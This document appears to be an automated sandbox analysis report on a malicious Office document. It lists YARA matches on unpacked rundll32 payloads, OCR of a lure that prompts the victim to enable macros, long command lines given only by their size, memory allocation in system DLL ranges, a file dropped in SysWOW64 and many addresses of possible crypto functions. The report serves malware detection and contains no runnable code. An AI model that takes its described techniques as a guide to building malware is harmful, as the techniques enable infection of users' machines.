Source: Yara match File source: 18.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.rundll32.exe.310000.1.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing and Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G)
Source: Screenshot number: 4 Screenshot OCR: Enable Content. 0 Page: I of I , words: 8,746 , ,3 , N@m 13 ;a 10096 G) FI G) ,, . i m.j
Source: Screenshot number: 8 Screenshot OCR: Enable Editing and Enable Content. a nmmm O I @ 100% G) A GE)
Source: Screenshot number: 8 Screenshot OCR: Enable Content. a nmmm O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and Enable Content.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
Very long command line found
Source: unknown Process created: Commandline size = 5669
Source: unknown Process created: Commandline size = 5568
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5568
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Itwxrtu\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200A0F1 7_2_0200A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF6417 7_2_01FF6417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF7FFE 7_2_01FF7FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF35FC 7_2_01FF35FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02002C05 7_2_02002C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF67EF 7_2_01FF67EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFF5E0 7_2_01FFF5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF2DDF 7_2_01FF2DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02000223 7_2_02000223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF57D4 7_2_01FF57D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02008C2B 7_2_02008C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200D02D 7_2_0200D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02002631 7_2_02002631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02008A33 7_2_02008A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02004C37 7_2_02004C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFF9BA 7_2_01FFF9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFFFBA 7_2_01FFFFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3FAF 7_2_01FF3FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFADAF 7_2_01FFADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02005250 7_2_02005250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFBB96 7_2_01FFBB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF4D90 7_2_01FF4D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02000672 7_2_02000672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200AA7B 7_2_0200AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF5B7D 7_2_01FF5B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF7378 7_2_01FF7378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3B74 7_2_01FF3B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02001090 7_2_02001090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFF369 7_2_01FFF369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFC364 7_2_01FFC364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02004A9E 7_2_02004A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFC145 7_2_01FFC145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF7B39 7_2_01FF7B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3938 7_2_01FF3938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF3336 7_2_01FF3336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF7731 7_2_01FF7731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF9D2F 7_2_01FF9D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200C6D9 7_2_0200C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFA525 7_2_01FFA525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200D4E1 7_2_0200D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF9106 7_2_01FF9106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF5F04 7_2_01FF5F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFECFE 7_2_01FFECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02004F04 7_2_02004F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200D70B 7_2_0200D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFD6F0 7_2_01FFD6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFD2DD 7_2_01FFD2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFA2D2 7_2_01FFA2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200CF31 7_2_0200CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFA6C9 7_2_01FFA6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02009B4A 7_2_02009B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200434E 7_2_0200434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02003F4F 7_2_02003F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200135B 7_2_0200135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFCAA3 7_2_01FFCAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200B165 7_2_0200B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200A966 7_2_0200A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFDE81 7_2_01FFDE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF327F 7_2_01FF327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02007187 7_2_02007187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02001F88 7_2_02001F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02000B8A 7_2_02000B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFBE74 7_2_01FFBE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02003590 7_2_02003590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200C192 7_2_0200C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02002FA1 7_2_02002FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020093AA 7_2_020093AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020047B5 7_2_020047B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020009B8 7_2_020009B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF4844 7_2_01FF4844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFE044 7_2_01FFE044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02007BBE 7_2_02007BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02009DBF 7_2_02009DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200DBC4 7_2_0200DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFA821 7_2_01FFA821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02006BE4 7_2_02006BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200CBE7 7_2_0200CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF5418 7_2_01FF5418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FFE612 7_2_01FFE612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF240F 7_2_01FF240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0200BBF1 7_2_0200BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF2208 7_2_01FF2208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_01FF1806 7_2_01FF1806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02001DFE 7_2_02001DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239C3D 7_2_00239C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00240604 7_2_00240604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023C017 7_2_0023C017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244012 7_2_00244012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249665 7_2_00249665
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023E272 7_2_0023E272
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235478 7_2_00235478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CC7F 7_2_0024CC7F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244478 7_2_00244478
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239846 7_2_00239846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024BC4D 7_2_0024BC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CA55 7_2_0024CA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023C851 7_2_0023C851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002392A3 7_2_002392A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C4A5 7_2_0024C4A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00236CA5 7_2_00236CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002328AA 7_2_002328AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002370AD 7_2_002370AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232EAC 7_2_00232EAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023B6B9 7_2_0023B6B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002490BE 7_2_002490BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002434BF 7_2_002434BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239A99 7_2_00239A99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002330E8 7_2_002330E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002368EC 7_2_002368EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002350F1 7_2_002350F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002414FC 7_2_002414FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002400FE 7_2_002400FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002466FB 7_2_002466FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002438C2 7_2_002438C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002434C3 7_2_002434C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002408CF 7_2_002408CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023B8D8 7_2_0023B8D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A6D9 7_2_0024A6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249EDA 7_2_00249EDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023E8DD 7_2_0023E8DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233523 7_2_00233523
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023A323 7_2_0023A323
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023EF2E 7_2_0023EF2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023F52E 7_2_0023F52E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00243D29 7_2_00243D29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023FF2C 7_2_0023FF2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247132 7_2_00247132
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249333 7_2_00249333
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D138 7_2_0024D138
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024B706 7_2_0024B706
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00234304 7_2_00234304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023B10A 7_2_0023B10A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242515 7_2_00242515
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024891E 7_2_0024891E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00235D63 7_2_00235D63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024B165 7_2_0024B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232B70 7_2_00232B70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241372 7_2_00241372
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00230D7A 7_2_00230D7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242179 7_2_00242179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023177C 7_2_0023177C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00234D48 7_2_00234D48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00232353 7_2_00232353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023EB54 7_2_0023EB54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00246158 7_2_00246158
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C15B 7_2_0024C15B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241BA5 7_2_00241BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247FA7 7_2_00247FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C5A1 7_2_0024C5A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002441AB 7_2_002441AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00233DB8 7_2_00233DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023D5B8 7_2_0023D5B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00231983 7_2_00231983
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023DB86 7_2_0023DB86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023598B 7_2_0023598B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023498C 7_2_0023498C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023F793 7_2_0023F793
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023F797 7_2_0023F797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00239D95 7_2_00239D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024819F 7_2_0024819F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023FBE6 7_2_0023FBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023B3E8 7_2_0023B3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327F3 7_2_002327F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0023D3F5 7_2_0023D3F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0202303C 7_2_0202303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_020187D0 7_2_020187D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_02031E14 7_2_02031E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02005250 8_2_02005250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF4D90 8_2_01FF4D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200A0F1 8_2_0200A0F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF5F04 8_2_01FF5F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFD2DD 8_2_01FFD2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFCAA3 8_2_01FFCAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02000B8A 8_2_02000B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_020047B5 8_2_020047B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF4844 8_2_01FF4844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFA821 8_2_01FFA821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200CBE7 8_2_0200CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF6417 8_2_01FF6417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF7FFE 8_2_01FF7FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF35FC 8_2_01FF35FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02002C05 8_2_02002C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF67EF 8_2_01FF67EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFF5E0 8_2_01FFF5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF2DDF 8_2_01FF2DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02000223 8_2_02000223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF57D4 8_2_01FF57D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02008C2B 8_2_02008C2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200D02D 8_2_0200D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02002631 8_2_02002631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02008A33 8_2_02008A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02004C37 8_2_02004C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFF9BA 8_2_01FFF9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFFFBA 8_2_01FFFFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3FAF 8_2_01FF3FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFADAF 8_2_01FFADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFBB96 8_2_01FFBB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02000672 8_2_02000672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200AA7B 8_2_0200AA7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF5B7D 8_2_01FF5B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF7378 8_2_01FF7378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3B74 8_2_01FF3B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02001090 8_2_02001090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFF369 8_2_01FFF369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFC364 8_2_01FFC364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02004A9E 8_2_02004A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFC145 8_2_01FFC145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF7B39 8_2_01FF7B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3938 8_2_01FF3938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF3336 8_2_01FF3336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF7731 8_2_01FF7731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF9D2F 8_2_01FF9D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200C6D9 8_2_0200C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFA525 8_2_01FFA525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200D4E1 8_2_0200D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF9106 8_2_01FF9106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFECFE 8_2_01FFECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02004F04 8_2_02004F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200D70B 8_2_0200D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFD6F0 8_2_01FFD6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFA2D2 8_2_01FFA2D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200CF31 8_2_0200CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFA6C9 8_2_01FFA6C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02009B4A 8_2_02009B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200434E 8_2_0200434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02003F4F 8_2_02003F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200135B 8_2_0200135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200B165 8_2_0200B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200A966 8_2_0200A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFDE81 8_2_01FFDE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF327F 8_2_01FF327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02007187 8_2_02007187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02001F88 8_2_02001F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFBE74 8_2_01FFBE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02003590 8_2_02003590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200C192 8_2_0200C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02002FA1 8_2_02002FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_020093AA 8_2_020093AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_020009B8 8_2_020009B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFE044 8_2_01FFE044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02007BBE 8_2_02007BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02009DBF 8_2_02009DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200DBC4 8_2_0200DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02006BE4 8_2_02006BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF5418 8_2_01FF5418
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FFE612 8_2_01FFE612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF240F 8_2_01FF240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0200BBF1 8_2_0200BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF2208 8_2_01FF2208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_01FF1806 8_2_01FF1806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02001DFE 8_2_02001DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CC017 8_2_001CC017
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D4012 8_2_001D4012
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001D0604 8_2_001D0604
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C9C3D 8_2_001C9C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DCA55 8_2_001DCA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001CC851 8_2_001CC851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DBC4D 8_2_001DBC4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001C9846 8_2_001C9846
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001DCC7F 8_2_001DCC7F
